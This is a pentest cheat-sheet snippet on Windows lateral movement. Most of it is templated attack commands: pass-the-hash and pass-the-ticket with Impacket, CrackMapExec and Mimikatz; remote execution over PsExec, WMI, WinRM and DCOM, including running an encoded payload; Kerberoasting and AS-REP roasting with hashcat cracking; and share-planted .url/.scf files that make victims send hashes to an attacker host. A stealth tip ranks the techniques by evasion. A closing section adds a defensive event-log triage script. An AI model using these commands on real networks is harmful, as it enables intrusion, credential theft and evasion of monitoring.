---
title: "Lateral Movement"
domain: security
subdomain: pentest
phase: 05-post-exploitation
type: snippet
tags: [lateral-movement, pth, pass-the-hash, psexec, wmi, winrm, impacket, pentest]
difficulty: advanced
status: stable
updated: "2025-05-13"
---
## Pass-the-Hash (PtH)

```bash
# Impacket: PsExec with an NTLM hash (LM part left empty before the colon)
psexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes :{{NTLM_HASH}}

# Impacket: WMIExec (fewer traces, no service created)
wmiexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes :{{NTLM_HASH}}

# Impacket: SMBExec
smbexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes :{{NTLM_HASH}}

# Impacket: ATExec (via Task Scheduler)
atexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes :{{NTLM_HASH}} "whoami"

# CrackMapExec: PtH sweep across a subnet
crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}}
crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}} -x "whoami"
crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}} --sam

# xfreerdp: RDP with a hash (Restricted Admin Mode required on the target)
xfreerdp /v:{{TARGET_IP}} /u:{{USER}} /pth:{{NTLM_HASH}}
```

## Pass-the-Ticket (PtT)

```bash
# Export tickets from memory (Mimikatz)
mimikatz# sekurlsa::tickets /export    # writes .kirbi files

# Import a ticket
mimikatz# kerberos::ptt [0;12bd0]-0-0-40810000-{{USER}}@cifs-target.kirbi
mimikatz# kerberos::ptt ticket.kirbi

# Check the tickets held in memory
mimikatz# kerberos::list
klist   # native Windows command

# From Linux: convert the ticket and use it
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass {{TARGET_DOMAIN}}/{{USER}}@{{TARGET}}

# Overpass-the-Hash (NTLM → Kerberos ticket)
mimikatz# sekurlsa::pth /user:{{USER}} /ntlm:{{NTLM_HASH}} /domain:{{TARGET_DOMAIN}} /run:powershell.exe
# Then, inside the new process:
klist     # check the tickets that were obtained
```

## PsExec and variants

```bash
# Impacket PsExec (creates a service: noisy, flagged by EDR)
psexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}}

# Sysinternals PsExec (native)
PsExec.exe \\{{TARGET_IP}} -u {{TARGET_DOMAIN}}\{{USER}} -p {{PASSWORD}} cmd.exe

# SmbExec (no binary dropped on disk)
smbexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}}
```

## WMI

```bash
# Impacket WMIExec (semi-interactive, no service created)
wmiexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}}
wmiexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}} "ipconfig /all"
```

```powershell
# PowerShell: local WMI
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt"

# PowerShell: remote WMI
$cred = Get-Credential
Invoke-WmiMethod -ComputerName {{TARGET_IP}} -Credential $cred -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt"
# Same thing through the [wmiclass] accelerator (the class path needs [wmiclass], not [wmi])
([wmiclass]"\\{{TARGET_IP}}\root\cimv2:Win32_Process").Create("cmd.exe")
```

## WinRM / PowerShell Remoting

```bash
# From Linux
evil-winrm -i {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}}
evil-winrm -i {{TARGET_IP}} -u {{USER}} -H {{NTLM_HASH}}

# CrackMapExec
crackmapexec winrm {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}} -x "whoami"
crackmapexec winrm {{TARGET_IP}} -u {{USER}} -H {{NTLM_HASH}} -x "whoami"
```

```powershell
# From Windows
Enter-PSSession -ComputerName {{TARGET_IP}} -Credential (Get-Credential)
Invoke-Command -ComputerName {{TARGET_IP}} -Credential (Get-Credential) -ScriptBlock { whoami; hostname }
```

## DCOM

```powershell
# MMC20.Application (port 135)
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","{{TARGET_IP}}"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c powershell -e {{B64_PAYLOAD}}","7")

# ShellWindows
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application","{{TARGET_IP}}"))
$dcom.ShellExecute("cmd.exe","/c powershell -e {{B64_PAYLOAD}}","C:\Windows\System32","",0)
```

## Kerberoasting

```bash
# GetUserSPNs: from Linux
GetUserSPNs.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}} -dc-ip {{TARGET_IP}} -request
GetUserSPNs.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}} -dc-ip {{TARGET_IP}} -request -outputfile kerberoast.txt
```

```powershell
# PowerView: from Windows
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv kerberoast.csv -NoTypeInformation
# -ExpandProperty writes the bare hash strings rather than a formatted object table
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File kerberoast.txt
```

```bash
# Crack (TGS-REP etype 23, hashcat mode 13100)
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
```

## ASREPRoasting

```bash
# GetNPUsers: accounts with Kerberos pre-authentication not required
GetNPUsers.py {{TARGET_DOMAIN}}/ -dc-ip {{TARGET_IP}} -usersfile users.txt -format hashcat
GetNPUsers.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}} -dc-ip {{TARGET_IP}} -request -format hashcat
```

```powershell
# PowerView
Get-DomainUser -PreauthNotRequired | Get-ASREPHash -Format Hashcat | Out-File asrep.txt
```

```bash
# Crack the AS-REP hash (hashcat mode 18200)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
```

## Lateral movement via shares

```bash
# Find shares with write access
crackmapexec smb {{TARGET}}/24 -u {{USER}} -p {{PASSWORD}} --shares

# Drop a file for hash capture (Responder)
# Create an @malicious.url or desktop.ini file in a writable share
echo "[InternetShortcut]
URL=file://{{LHOST}}/x" > @capture.url

# SCF file (in a share)
echo "[Shell]
Command=2
IconFile=\\{{LHOST}}\share\icon.ico" > @loot.scf

# Capture with Responder
responder -I {{INTERFACE}} -wrf
```

<Tip>
WMIExec and ATExec are quieter than PsExec because they do not create a Windows service (Event ID 7045). Evil-WinRM leaves traces in the PowerShell Remoting logs (Event ID 4103/4104). The stealthiest movement remains PtT with a valid ticket: no new process is created.
</Tip>
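The artifacts named in the tip are exactly what a blue team keys on. As an added, defender-side example that is not part of the original snippet, the script below triages a small stream of Windows event records for the three signals above: a System 7045 service install (PsExec-style), PowerShell 4103/4104 module or script-block logging (WinRM sessions), and a Security 4624 network logon (type 3) authenticated with NTLM rather than Kerberos, which is the classic coarse indicator of pass-the-hash. The sample events and their flat field names (`channel`, `event_id`, `service_name`, `auth_package`, ...) are constructed for the example and modelled loosely on a winlogbeat/Sysmon-style JSON export; they are not a vendor schema.

```python
"""Triage of lateral-movement artifacts in Windows event records (added example)."""
from collections import defaultdict

# Constructed sample events (not real telemetry). Field names are an assumption.
SAMPLE_EVENTS = [
    {"host": "WS01", "channel": "System", "event_id": 7045,
     "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    {"host": "WS01", "channel": "Security", "event_id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "user": "admin", "src_ip": "10.0.0.5"},
    {"host": "WS02", "channel": "Microsoft-Windows-PowerShell/Operational",
     "event_id": 4104, "script_block": "whoami; hostname"},
    {"host": "WS03", "channel": "Security", "event_id": 4624, "logon_type": 3,
     "auth_package": "Kerberos", "user": "svc_backup", "src_ip": "10.0.0.7"},
]


def classify(event):
    """Return (label, severity) for one event, or None when it is not of interest."""
    eid = event.get("event_id")
    channel = event.get("channel", "")

    # 7045: a new service was installed. Sysinternals PsExec names its service
    # PSEXESVC; Impacket's psexec.py uses a random name, so any 7045 on a
    # workstation deserves a look, just with a lower default severity.
    if channel == "System" and eid == 7045:
        severity = "high" if "PSEXESVC" in event.get("service_name", "").upper() else "medium"
        return ("service_installed", severity)

    # 4103 (module logging) / 4104 (script block logging): a remoting session
    # ran PowerShell on this host. Low on its own, useful for correlation.
    if eid in (4103, 4104) and "PowerShell" in channel:
        return ("powershell_logging", "low")

    # 4624 type 3 with NTLM: a network logon that skipped Kerberos. In a
    # Kerberos-capable domain this is the usual pass-the-hash footprint.
    if channel == "Security" and eid == 4624 and event.get("logon_type") == 3:
        if event.get("auth_package") == "NTLM":
            return ("ntlm_network_logon", "medium")

    return None


def triage(events):
    """Group findings per host: {host: [(label, severity), ...]}."""
    findings = defaultdict(list)
    for ev in events:
        hit = classify(ev)
        if hit is not None:
            findings[ev["host"]].append(hit)
    return dict(findings)


def hosts_by_severity(findings, severity):
    """Sorted hosts that carry at least one finding of the given severity."""
    return sorted(h for h, hits in findings.items() if any(s == severity for _, s in hits))


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for host, hits in result.items():
        print(host, hits)
    print("high:", hosts_by_severity(result, "high"))
```

Run as-is it flags WS01 twice (service install plus NTLM network logon, which together look like a PsExec pass-the-hash session), WS02 once for the remoting script block, and leaves the Kerberos logon on WS03 alone. The pass-the-ticket case in the tip is the one this script cannot see: a valid TGS presented over SMB produces an ordinary Kerberos 4624 indistinguishable from WS03, which is why the tip calls it the stealthiest option and why defenders correlate it with 4769 ticket requests and source-host anomalies instead.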
